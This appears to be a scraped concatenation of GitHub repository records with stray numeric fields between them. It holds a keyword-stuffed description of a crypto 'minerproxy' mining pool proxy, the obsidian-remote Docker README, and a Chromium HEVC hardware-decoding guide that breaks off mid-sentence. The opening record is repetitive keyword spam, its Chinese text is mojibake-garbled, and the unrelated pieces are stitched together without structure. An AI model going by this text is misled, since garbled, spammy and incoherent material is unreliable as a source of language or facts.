minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, minerproxy, ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ็Ÿฟๆฑ , ๆŠฝๆฐด, ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด, ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด,ๆŠฝๆฐด, ETH, ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH,ETH, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC, BTC
minerproxy,miner,ktminer,ethproxy,btcproxy,poolproxy,ktproxy,btc,eth,ethereum
47
1
0
402
29
1
0
sytone/obsidian-remote
# obsidian-remote This docker image allows you to run [obsidian](https://obsidian.md/) in docker as a container and access it via your web browser. Use `http://localhost:8080/` to access it locally, do not expose this to the web unless you secure it and know what you are doing!! - [Using the Container](#using-the-container) - [Ports](#ports) - [Mapped Volumes](#mapped-volumes) - [Environment Variables](#environment-variables) - [Using Docker Compose](#using-docker-compose) - [Enabling GIT for the obsidian-git plugin](#enabling-git-for-the-obsidian-git-plugin) - [Docker CLI example](#docker-cli-example) - [Reloading Obsidan in the Browser](#reloading-obsidan-in-the-browser) - [Setting PUID and PGID](#setting-puid-and-pgid) - [Adding missing fonts](#adding-missing-fonts) - [Map font file using Docker CLI](#map-font-file-using-docker-cli) - [Map font file using Docker Compose](#map-font-file-using-docker-compose) - [Hosting behind a reverse proxy](#hosting-behind-a-reverse-proxy) - [Example nginx configuration](#example-nginx-configuration) - [Hosting behind Nginx Proxy Manager (NPM)](#hosting-behind-nginx-proxy-manager-npm) - [Updating Obsidian](#updating-obsidian) - [Building locally](#building-locally) - [Copy/Paste From External Source](#copypaste-from-external-source) ## Using the Container To run a interactive version to test it out. This is using windows based path, update for the OS you are running on. ```PowerShell docker run --rm -it ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -p 8080:8080 ` ghcr.io/sytone/obsidian-remote:latest ``` To run it as a daemon in the background. ```PowerShell docker run -d ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -p 8080:8080 ` ghcr.io/sytone/obsidian-remote:latest ``` The ARM container is now avaliable, will look to make this simpler in the future. The ARM imange is on the docker hub and not the github container registry. ```PowerShell docker run -d ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -p 8080:8080 ` sytone/obsidian-remote:latest ``` ### Ports | Port | Description | | ----- | --------------------------------------- | | 8080 | HTTP Obsidian Web Interface | | 8443 | HTTPS Obsidian Web Interface | ### Mapped Volumes | Path | Description | | --------- | ------------------------------------------------------------------------- | | `/vaults` | The location on the host for your Obsidian Vaults | | `/config` | The location to store Obsidan configuration and ssh data for obsidian-git | ### Environment Variables | Environment Variable | Description | | -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | PUID | Set the user ID for the container user. `911` by default. | | PGID | Set the group ID for the continer user. `911` by default. | | TZ | Set the Time Zone for the container, should match your TZ. `Etc/UTC` by default. See [List of tz database time zones](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) for valid options. | | DOCKER_MODS | Use to add mods to the container like git. E.g. `DOCKER_MODS=linuxserver/mods:universal-git` See [Docker Mods](https://github.com/linuxserver/docker-mods) for details. | | KEYBOARD | Used to se the keyboard being used for input. E.g. `KEYBOARD=en-us-qwerty` or `KEYBOARD=de-de-qwertz` a list of other possible values (not tested) can be found at <https://github.com/linuxserver/docker-digikam#keyboard-layouts> | | CUSTOM_PORT | Internal port the container listens on for http if it needs to be swapped from the default 3000. | | CUSTOM_HTTPS_PORT | Internal port the container listens on for https if it needs to be swapped from the default 3001. | | CUSTOM_USER | HTTP Basic auth username, abc is default. | | PASSWORD | HTTP Basic auth password, abc is default. If unset there will be no auth | | SUBFOLDER | Subfolder for the application if running a subfolder reverse proxy, need both slashes IE `/subfolder/` | | TITLE | The page title displayed on the web browser, default "KasmVNC Client". | | FM_HOME | This is the home directory (landing) for the file manager, default "/config". | ## Using Docker Compose ```YAML services: obsidian: image: 'ghcr.io/sytone/obsidian-remote:latest' container_name: obsidian-remote restart: unless-stopped ports: - 8080:8080 - 8443:8443 volumes: - /home/obsidian/vaults:/vaults - /home/obsidian/config:/config environment: - PUID=1000 - PGID=1000 - TZ=America/Los_Angeles - DOCKER_MODS=linuxserver/mods:universal-git - CUSTOM_PORT="8080" - CUSTOM_HTTPS_PORT="8443" - CUSTOM_USER="" - PASSWORD="" - SUBFOLDER="" ``` ## Enabling GIT for the obsidian-git plugin This container uses the base images from linuxserver.io. This means you can the linuxserver.io mods. To add support for git add the `DOCKER_MODS` environment variable like so `DOCKER_MODS=linuxserver/mods:universal-git`. ### Docker CLI example ```PowerShell docker run -d ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -p 8080:8080 ` -e DOCKER_MODS=linuxserver/mods:universal-git ` ghcr.io/sytone/obsidian-remote:latest ``` ## Reloading Obsidan in the Browser If you make changes to plugins or do updates that need to have obsidian restarted, instead of having to stop and start the docker container you can just close the Obsidian UI and right click to show the menus and reopen it. Here is a short clip showing how to do it. ![Reloading Obsidian in the Browser](./assets/ReloadExample.gif) ## Setting PUID and PGID To set PUID and PGID use the follow environment variables on the command line, by default the IDs are 911/911 ```PowerShell docker run --rm -it ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -e PUID=1000 ` -e PGID=1000 ` -p 8080:8080 ` ghcr.io/sytone/obsidian-remote:latest ``` Or, if you use docker-compose, add them to the environment: section: ```yaml environment: - PUID=1000 - PGID=1000 ``` It is most likely that you will use the id of yourself, which can be obtained by running the command below. The two values you will be interested in are the uid and gid. ```powershell id $user ``` ## Adding missing fonts Thanks to @aaron-jang for this example. Download the font of the language that you want to use in Obsidian and add it to the volume as shown below. ### Map font file using Docker CLI ```PowerShell -v {downloaded font directory}:/usr/share/fonts/truetype/{font name} ``` ### Map font file using Docker Compose ```PowerShell volumes: - {downloaded font directory}:/usr/share/fonts/truetype/{font name} ``` ## Hosting behind a reverse proxy If you wish to do that **please make sure you are securing it in some way!**. You also need to ensure **websocket** support is enabled. ### Example nginx configuration This is an example, I recommend a SSL based proxy and some sort of authentication. ``` server { set $forward_scheme http; set $server "10.10.10.10"; set $port 8080; listen 80; server_name ob.mycooldomain.com; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection $http_connection; proxy_http_version 1.1; access_log /data/logs/ob_access.log proxy; error_log /data/logs/ob_error.log warn; location / { proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection $http_connection; proxy_http_version 1.1; # Proxy! add_header X-Served-By $host; proxy_set_header Host $host; proxy_set_header X-Forwarded-Scheme $scheme; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-For $remote_addr; proxy_set_header X-Real-IP $remote_addr; proxy_pass $forward_scheme://$server:$port$request_uri; } } ``` ## Hosting behind Nginx Proxy Manager (NPM) Thanks to @fahrenhe1t for this example. If you install obsidian-remote in Docker, you can proxy it through [Nginx Proxy Manager](https://nginxproxymanager.com/) (NPM - running on the same Docker instance), and use an access list to provide user authentication. The obsidian-remote container would have to be on the same network as Nginx Proxy Manager. If you don't expose the IP external to the container, authentication would be forced through NPM: ```yaml services: obsidian: image: 'ghcr.io/sytone/obsidian-remote:latest' container_name: obsidian-remote restart: unless-stopped ports: - 8080 #only exposes port internally to the container volumes: - /home/obsidian/vaults:/vaults - /home/obsidian/config:/config environment: - PUID=1000 - PGID=1000 - TZ=America/Los_Angeles - DOCKER_MODS=linuxserver/mods:universal-git networks: default: name: <your nginx proxy manager network> external: true ``` Create a proxy host in NPM pointing to the "obsidian-remote:8080" container, choose your domain name, use a LetsEncrypt SSL certificate, enable WebSockets. This video talks about it: [Nginx Proxy Manager - ACCESS LIST protection for internal services](https://www.youtube.com/watch?v=G9voYZejH48) ## Updating Obsidian By default obsidian will update itself in the container. If you recreate the container you will have to do the update again. This repo will be updated periodically to keep up with the latest version of Obsidian. ## Building locally To build and use it locally run the following commands: ```PowerShell docker build --pull --rm ` -f "Dockerfile" ` -t obsidian-remote:latest ` "." ``` To run the localy build image: ```PowerShell docker run --rm -it ` -v D:/ob/vaults:/vaults ` -v D:/ob/config:/config ` -p 8080:8080 ` obsidian-remote:latest bash ``` ## Copy/Paste From External Source Click on the circle to the left side of your browser window. In there you will find a textbox for updating the remote clipboard or copying from it. ![image](https://user-images.githubusercontent.com/1399443/202805847-a87e2c7c-a5c6-4dea-bbae-4b25b4b5866a.png)
Run Obsidian.md in a browser via a docker container.
obsidian-md
6
6
28
61
39
3
2
StaZhu/enable-chromium-hevc-hardware-decoding
# enable-chromium-hevc-hardware-decoding A guide that teach you enable hardware HEVC decoding & encoding for Chrome / Edge, or build a custom version of Chromium / Electron that supports hardware & software HEVC decoding and hardware HEVC encoding. ##### English | [็ฎ€ไฝ“ไธญๆ–‡](./README.zh_CN.md) ## Usage #### Chrome & Edge (Mac) & Chromium Make sure version >= 107 then open directly. ## What's the hardware decoding supported HEVC profile? HEVC Main (Up to 8192x8192 pixels) HEVC Main 10 (Up to 8192x8192 pixels) HEVC Main Still Picture (only Windows is not supported, up to 8192x8192 pixels) HEVC Rext (partially supported, see the table below for details, up to 8192x8192 pixels) | GPU | 8b 420 | 8b 422 | 8b 444 | 10b 420 | 10b 422 | 10b 444 | 12b 420 | 12b 422 | 12b 444 | | :--------------------- | :----- | :------------- | :------------- | :------- | :------ | :------ | :------ | :------------ | :------------- | | Apple Silicon (macOS) | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… | โŒ | โŒ | โŒ | | Intel ICL ~ TGLx (Win) | โœ… |โœ…<sup>[5]</sup>|โœ…<sup>[4]</sup>| โœ… | โœ… | โœ… | โŒ | โŒ | โŒ | | Intel TGLx+ (Win) | โœ… |โœ…<sup>[5]</sup>|โœ…<sup>[4]</sup>| โœ… | โœ… | โœ… | โœ… |โœ…<sup>[4]</sup>|โœ…<sup>[4]</sup>| โœ…๏ผšGPU + software support โŒ๏ผšGPU not support *Note 1: Intel Macs support HEVC Rext software decoding of 8 ~ 12b 400, 420, 422, 444 contents. Apple Silicon Mac supports HEVC Rext hardware decoding of 8 ~ 10b 400, 420, 422, 444 contents, and software decoding of 12b 400, 420, 422, 444 contents on macOS 13+.* *Note 2: Intel Gen10 GPUs support HEVC Rext hardware decoding of 8b 420, 8b 422, 8b 444, 10b 420, 10b 422, 10b 444 contents on Windows. Gen11+ GPUs additionally support HEVC Rext hardware decoding of 12b 420, 12b 422, 12b 444 contents.* *Note 3: Although NVIDIA GPUs support HEVC Rext hardware decoding of 8 ~ 12b non-422 contents via CUVIA or NVDEC, but because they did not provide a D3D11 interface, thus Chromium will not support it in the future.* *Note 4: HEVC 8b 444, 12b 422, 12b 444 support requires Chrome >= `117.0.5866.0`.* *Note 5: HEVC 8b 422 support requires Chrome >= `118.0.5956.0`.* *Note 6: To retain the original 4:2:2/4:4:4 chroma sampling, requires Chrome >= `125.0.6408.0`.* ## What's the hardware encoding supported HEVC profile? HEVC Main (macOS & Windows & Android, macOS up to 4096x2304 px & 120 fps, Windows up to 1920*1088 px & 30 fps, Android up to the hardware) *Note 1: You need to pass a chrome switch to enable it๏ผˆ`--enable-features=PlatformHEVCEncoderSupport`๏ผ‰[Test Page](https://w3c.github.io/webcodecs/samples/encode-decode-worker/index.html).* *Note 2: Windows / Mac need to make sure Chrome version >= `109.0.5397.0`๏ผŒAndroid need to make sure Chrome version >= `117.0.5899.0`ใ€‚* ## What's the OS requirement? macOS Big Sur (11.0) and above Windows 8 and above Android 5.0 and above Chrome OS (Only supports GPUs that support VAAPI interface, eg: Intel GPU) Linux (Chrome version >= `108.0.5354.0`, and only supports GPUs that support VAAPI interface, eg: Intel GPU) ## What's the API supported? Video Decode: File, Media Source Extensions, WebCodec (8Bit requires >= `107.0.5272.0`, 10Bit + HEVC with Alpha requires >= `108.0.5343.0`), Clearkey and Widevine L1 (HW only) Encrypted Media Extensions are supported. WebRTC is not supported. Video Encode: WebCodec (Windows, macOS, and Android, when passing `--enable-features=PlatformHEVCEncoderSupport`) is supported. ## What's the GPU requirement? #### Discrete GPU Intel DG1 and above NVIDIA GT635, GTX645 and above AMD RX460 and above #### Integrated GPU Intel HD4400, HD515 and above AMD Radeon R7, Vega M and above Apple M1, M1 Pro, M1 Max, M1 Ultra and above #### Detail Table [Intel](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/intel.html) [AMD](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/amd.html) [NVIDIA](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/nvidia.html) ## HDR Supports? (Compared with Edge / Safari / Firefox) | | PQ | HDR10 | HDR10+ | HLG | DV P5 | DV P8.1 | DV P8.4 | | :-------------- | :------- | :------- | :------- | :------- |:-------- |:--------- |:----------- | | Chrome Mac | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… | | Chrome Win | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… | | Edge Mac | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… | | Edge Win | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… | | Safari Mac | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… | | Firefox Win<sup>[1]</sup>| โŒ | โŒ | โŒ | โŒ | โŒ | โŒ | โŒ | On Windows platform, Chrome supports PQ, HDR10 (PQ with static metadata), and HLG. Automatic Tone-mapping will be enabled based on static metadata (if present). HDR10+ SEI dynamic metadata wil be ignored while decoding and playback will downgrade to HDR10. On macOS platform, Chrome supports PQ, HDR10 (PQ with static metadata), HLG. In SDR / HDR / Hybrid mode, the macOS system will automatically perform EDR to ensure that HDR is displayed correctly. Chrome / Edge shared the same code thus has the same decoding ability, Safari also supports the above all HDR formats. *Note 1: Firefox >= 120 just added HEVC decoding support (Windows platform only, experimental, need to manually set `media.wmf.hevc.enabled=1` to enable the feature). Based on my testing, Firefox supports HEVC Main profile while doesn't support Main10 profile (HDR contents usually encoded with Main10 profile) yet, if the bug got fixed, I will re-test and update the table later.* #### Dolby Vision Supports Status There are two type of support type here: 1. Type 1: Supports RPU dynamic metadata and Profile 5 (IPTPQc2). 2. Type 2: Supports profiles like Profile 8/9 that has cross-compatible HDR10/HLG/SDR support. For the first type, currently only Chromecast and Windows platforms have very limited support. On Windows platform, Chrome supports encrypted Dolby Vision content, for versions of Chrome >= 110, when manually passing `--enable-features=PlatformEncryptedDolbyVision` switch and launch Chrome and when the system has installed the Dolby Vision extension and HEVC video extension, Profile 4/5/8 will be supported, "Supported" will be returned when querying the API (Note: For external HDR displays, if HDR mode is turned on, Microsoft's MediaFoundation has a bug and will not return "Supported" results). For the second type, Profile 8/9 with cross-compatibility such as HLG, HDR10, SDR, using API to query with `dvh1`, `dvhe`, `dva1`, `dvav` will return "not supported" (for example :`MediaSource.isTypeSupported('video/mp4;codecs="dvh1.08.07"')`), while when querying with `hvc1`, `hev1`, `avc1`, `avc3`, "supported" will be returned. The specific version of Chrome has different implementation details: Chrome >= 122. as long as the platform supports HEVC, then it is supported. Assuming that the API used by developers is MSE, the logic will be something like below: ```javascript if (isTypeSupported('video/mp4;codecs="dvh1.08.07"')) { if (use_rpu) { // Playback should success. Chrome internally considers the codec to be Dolby Vision // and uses RPU dynamic metadata. source.addSourceBuffer('video/mp4;codecs="dvh1.08.07"'); ... } else if (dvcc.dv_bl_signal_compatibility_id === 1 || dvcc.dv_bl_signal_compatibility_id === 2 || dvcc.dv_bl_signal_compatibility_id === 4) { // Playback should success. Chrome internally considers the codec to be HEVC, // ignores RPU dynamic metadata, decode and render in HLG/HDR10/SDR mode. // Note: If it is profile 5, source buffer can only be created with `dvh1` or `dvhe` // mimetype. source.addSourceBuffer('video/mp4;codecs="hev1.2.4.L120.90"'); ... } else { // Playback should fails, for incompatible dolby profiles, if you use HEVC construct // source buffer, it will always fails. } } else if (isTypeSupported('video/mp4;codecs="hev1.2.4.L120.90"')) { if (dvcc.dv_bl_signal_compatibility_id === 1 || dvcc.dv_bl_signal_compatibility_id === 2 || dvcc.dv_bl_signal_compatibility_id === 4) { // Playback should success. Chrome internally considers the codec to be HEVC, // ignores RPU dynamic metadata, decode and render in HLG/HDR10/SDR mode. source.addSourceBuffer('video/mp4;codecs="hev1.2.4.L120.90"'); ... } else { // Playback should fails, for example when Chrome does not support profile 5 but you use // HEVC construct SourceBuffer. } } else { // Playback should fails, HEVC is not supported. } ``` Versions 110 ~ 121 of Chrome on Windows, Dolby Vision is not playable at all if its not encrypted, this is a bug of the browser. Chrome on other platforms, such as macOS, Android, etc, as long as constructing source buffer with `hvc1`, `hev1`, `avc1`, `avc3` and the sample entry is not `dvh1`, `dvhe`, `dva1`, `dvav`, then the playback should be success. Versions 107 ~ 109 of Chrome, if constructing source buffer with `hvc1`, `hev1`, `avc1`, `avc3` and the sample entry is not `dvh1`, `dvhe`, `dva1`, `dvav`, then the playback should be success. #### HDR support by version of Chrome/Edge Chrome 107 does not support the ability to extract HEVC static metadata, and all HDR10 video playback are downgraded to PQ only mode. HLG videos uses the video processor API provided by the GPU vendor for processing tone-mapping has a poor performance on some laptops, and playing 4K video may cause frame droping. Chrome 108 supports the ability to extract HEVC static metadata. For videos with static metadata written in the container, the playback is okey on 108, but some videos are not written static metadata to their containers, thus Chrome 108 can not extract the static metadata from these videos which causing the playback to be downgraded to PQ only mode, and the max content light level maybe cutted to a low value for these videos. In addition, the HLG Tone-mapping algorithm on Windows platform has been switched to Chrome's own algorithm, which solves the problem of bad performance on the laptop when using video processor for HLG Tone-mapping. However, Chrome has been using 8 bit for Tone-mapping, which resulting an insufficient contrast ratio of the Tone-mapping result. Chrome 109 makes the HDR -> SDR process to a 16 bit + zero copy process, which improves the accuracy of PQ Tone-mapping on Windows platform, thus the problem of the insufficient contrast ratio for HLG has been also solved, and the video memory usage has been reduced by about 50%. Chrome 110 solves the problem of incomplete static metadata extraction. It supports the extraction of static metadata from both the bitstream and the container, thus the max content light level issue has been solved, and at this point all HDR issues should have been resolved. Chrome 119 fixed 10bit video playback issues for AMD GPU on Windows platform (black screen when playing HLG video in SDR mode, 4K freezes, high memory usage, color change when switching full-screen, crash when playing SDR video in HDR mode). Chrome 122 improved Dolby Vision cross-compatible playback ability. Chrome 123 ensures that on Windows platforms, PQ/HDR10 video can be rendered at absolute brightness when system HDR mode is enabled. It also solves the problem of abnormal Tone-mapping issue when the window is dragged between SDR monitor / HDR monitor when multiple monitors are connected. Chrome 124 solves the issue that on Windows platform when the NVIDIA RTX Auto HDR feature is enabled, page scrolling will cause video brightness transition. Chrome 125 solves all issues with Intel HDR10 MPO, the feature has been re-enabled. Edge 125 solves the issue of no zero-copy output when using `VDAVideoDecoder` decodes HEVC Main10 10bit contents on the Windows platform, and the issue of PQ/HDR10/HLG bad tone-mapping result could also be solved. The HDR rendering results of later versions of Edge are expected to be exactly the same as Chrome, performed by Skia, and the rendering results of various GPU manufacturers will remain consistent no matter system HDR mode on or off (Intel HDR10 MPO may be enabled if system HDR mode is turned on and GPU generation >= 11, which may result in slight inconsistencies with Skia rendering results). ## How to verify certain profile or resolution is supported๏ผŸ ### Clear Content #### MediaCapabilities ```javascript const mediaConfig = { /** * You can use `file` or `media-source` and the result are same here, * don't use `webrtc` since HEVC webrtc is not supported currently. */ type: 'file', video: { /** * HEVC Profile * * Main: `hev1.1.6.L93.B0` * Main 10: `hev1.2.4.L93.B0` * Main still-picture: `hvc1.3.E.L93.B0` * Range extensions: `hvc1.4.10.L93.B0` */ contentType : 'video/mp4;codecs="hev1.1.6.L120.90"', /* Width */ width: 1920, /* Height */ height: 1080, /* Any number */ bitrate: 10000, /* Any number */ framerate: 30 } } navigator.mediaCapabilities.decodingInfo(mediaConfig) .then(result => { /* Indicate whether or not the video with given profile, width, and height can played well on the browser */ if (result.supported) { console.log('Video can play!'); } else { console.log('Video can\'t play!'); } }); ``` #### MediaSource ```javascript if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.1.6.L120.90"')) { console.log('HEVC main profile is supported!'); } if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.2.4.L120.90"')) { console.log('HEVC main 10 profile is supported!'); } if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.3.E.L120.90"')) { console.log('HEVC main still-picture profile is supported!'); } if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.4.10.L120.90"')) { console.log('HEVC range extensions profile is supported!'); } ``` #### CanPlayType ```javascript const video = document.createElement('video'); if (video.canPlayType('video/mp4;codecs="hev1.1.6.L120.90"') === 'probably') { console.log('HEVC main profile is supported!'); } if (video.canPlayType('video/mp4;codecs="hev1.2.4.L120.90"') === 'probably') { console.log('HEVC main 10 profile is supported!'); } if (video.canPlayType('video/mp4;codecs="hev1.3.E.L120.90"') === 'probably') { console.log('HEVC main still-picture profile is supported!'); } if (video.canPlayType('video/mp4;codecs="hev1.4.10.L120.90"') === 'probably') { console.log('HEVC range extensions profile is supported!'); } ``` #### VideoDecoder ```javascript const videoConfig = { /** * HEVC Profile * * Main: `hev1.1.6.L93.B0` * Main 10: `hev1.2.4.L93.B0` * Main still-picture: `hvc1.3.E.L93.B0` * Range extensions: `hvc1.4.10.L93.B0` */ codec: 'hev1.1.6.L120.90', /* HEVC is always hw accelerated */ hardwareAcceleration: 'prefer-hardware', /* Width */ codedWidth: 1280, /* Height */ codedHeight: 720, } try { const result = await VideoDecoder.isConfigSupported(videoConfig); /* Indicate whether or not the video with given profile, width, and height can be decoded by WebCodecs API */ if (result.supported) { console.log('Video can play!'); } else { console.log('Video can\'t play!'); } } catch (e) { /* There is a bug that in previous version of Chromium, the api may throw Error if config is not supported */ console.log('Video can\'t play!'); } ``` *Note 1๏ผšThe above four API have already took `--disable-gpu`, `--disable-accelerated-video-decode`, `gpu-workaround`, `settings - system - Use hardware acceleration when available`, `OS version` etc... into consideration, and if Chrome version >= `107.0.5304.0` (There is a bug in Chrome 108 and previous versions on Windows platform. If a specific GPU driver version causes D3D11VideoDecoder to be disabled for some reason, although the hardware decoding is no longer available, APIs such as isTypeSupported may still return "support", the bug has been fixed in Chrome 109) and OS is macOS or Windows, the result are guaranteed.* *Note 2: There is a bug for the Android platform, Chrome < `112.0.5612.0` does not return the actual support status of different devices (although Android >= 5.0 supports HEVC main profile SW decoding by default, however whether main10 profile is supported or not completely depends on hardware), and always assume that all HEVC profiles and resolution are supported. Chrome >= `112.0.5612.0` now solves this bug, and will return the correct result depends on hardware and the given video's resolution. Just like Windows and macOS, the above three APIs are supported as well, and every influencing factors should have been taken into account.* *Note 3๏ผšCompared with `MediaSource.isTypeSupported()` or `CanPlayType()`, we recommend using `MediaCapabilities`, since `MediaCapabilities` not only takes `settings - system - Use hardware acceleration when available` etc... into consideration, but also check if the given `width and height` is supported or not since different GPU may have different max resolution support, eg: some AMD GPU only support up to 4096 * 2048, and some old GPU only support up to 1080P.* ### Encrypted Content #### requestMediaKeySystemAccess ```javascript /** Detect HEVC Widevine L1 support (only Windows is supported). */ try { await navigator.requestMediaKeySystemAccess('com.widevine.alpha.experiment', [ { initDataTypes: ['cenc'], distinctiveIdentifier: 'required', persistentState: 'required', sessionTypes: ['temporary'], videoCapabilities: [ { robustness: 'HW_SECURE_ALL', contentType: 'video/mp4; codecs="hev1.1.6.L120.90"', }, ], }, ]); console.log('Widevine L1 HEVC main profile is supported!'); } catch (e) { console.log('Widevine L1 HEVC main profile is not supported!'); } /** * Detect Dolby Vision Widevine L1 support (only Windows is supported, and only if * `--enable-features=PlatformEncryptedDolbyVision` switch has been passed). */ try { await navigator.requestMediaKeySystemAccess('com.widevine.alpha.experiment', [ { initDataTypes: ['cenc'], distinctiveIdentifier: 'required', persistentState: 'required', sessionTypes: ['temporary'], videoCapabilities: [ { robustness: 'HW_SECURE_ALL', contentType: 'video/mp4; codecs="dvhe.05.07"', }, ], }, ]); console.log('Widevine L1 DV profile 5 is supported!'); } catch (e) { console.log('Widevine L1 DV profile 5 is not supported!'); } ``` ## What's the tech diff? (Compared with Edge / Safari / Firefox) #### Windows Edge uses `VDAVideoDecocder` to call `MFT` (need to install `HEVC Video Extension`, Edge 117 ~ 121 uses `MediaFoundationRenderer`, and switch back to the original `VDAVideoDecocder` after version 122) to finish the HEVC decoding which is the same tech behind `Movies and TV` builtin system app. Firefox (>= 120, experimental, need to manually set `media.wmf.hevc.enabled=1` to enable the feature) uses `MFT` (need to install `HEVC Video Extension`) to finish the HEVC decoding which is the same tech behind `Movies and TV` builtin system app. When using `MFT`, If the device does not have hardware decoding support of a specific profile (i.e. NVIDIA GTX 745 does not support Main10 profile) or resolution (i.e. NVIDIA GTX 960 does not support resolutions above 4K), `MFT` will automatically switch to software decoding. Chrome uses `D3D11VideoDecoder` to call `D3D11VA` (no need to install anything) to finish the HEVC HW decoding which is the same tech behind video players like `VLC`. #### macOS Edge and Chrome use the same decoding implementations on macOS. Safari and Chrome use the same `VideoToolbox` to finish the HEVC decoding, if the device does not have hardware support, it will automatically fallback to use software decoding. Compared with Safari, Chrome requires higher OS version (10.13 vs 11.0). ## How to verify HEVC hardware support is enabled? 1. Open `chrome://gpu`, and search `Video Acceleration Information`, you should see **Decode hevc main** field and **Decode hevc main 10** field (macOS will show **Decode hevc main still-picture** and **Decode hevc range extensions** as well, Windows Intel Gen10+ iGPU will show **Decode hevc range extensions** as well) present if hardware decoding is supported (macOS is an exception here, you see this field doesn't means the decode will use hardware, it actually depends on your GPU). 2. Open `chrome://media-internals` and play some HEVC video ([Test Page](https://lf-tk-sg.ibytedtos.com/obj/tcs-client-sg/resources/video_demo_hevc.html)) if the decoder is `VDAVideoDecoder` or `VideoToolboxVideoDecoder` or `D3D11VideoDecoder` or `VaapiVideoDecoder` that means the video is using hardware decoding (macOS is an exception here, if the OS >= Big Sur, and the GPU doesn't support HEVC, VideoToolbox will fallback to software decode which has a better performance compared with FFMPEG, the decoder is `VDAVideoDecoder` or `VideoToolboxVideoDecoder` in this case indeed), and if the decoder is `FFMpegVideoDecoder` that means the video is using software decoding. 3. Open `Activity Monitor` on Mac and search `VTDecoderXPCService`, if the cpu usage larger than 0 when playing video, that means hardware (or software) decoding is being used. 4. Open `Windows Task Manager` on Windows and switch to `Performance` - `GPU`, if `Video Decode`(Intel, NVIDIA) or `Video Codec`(AMD) usage larger than 0 when playing video, that means hardware decoding is being used. For some first generation GPU (i.e: NVIDIA RTX 745) that support HEVC, since there is no dedicated hw decoding circuit inside the GPU, although the `D3D11` decoding API is supported, it will only occupy the general `3D` utilization when decoding. ## Why my GPU support HEVC, but still not able to hardware decode? #### OS version is too low ##### Windows Please make sure you are using Windows 8 and above, this is because the `D3D11VideoDecoder` doesn't support Windows 7. ##### macOS Please make sure you are using macOS Big Sur and above, this is because `CMVideoFormatDescriptionCreateFromHEVCParameterSets` API has compatibility issue on lower macOS. #### GPU driver has bug Some GPU driver may has bug which will cause `D3D11VideoDecoder` forbidden to use. in this case, you need to upgrade your GPU driver and try again. [See reference](https://source.chromium.org/chromium/chromium/src/+/main:gpu/config/gpu_driver_bug_list.json?q=disable_d3d11_video_decoder) #### GPU hardware has bug Some GPU hardware may has bug which will cause `D3D11VideoDecoder` forbidden to use. in this case, we can't do anything else but to use the FFMPEG software decode. [See reference](https://source.chromium.org/chromium/chromium/src/+/main:gpu/config/gpu_driver_bug_list.json?q=disable_d3d11_video_decoder) ## How to Build? 1. Follow [the official build 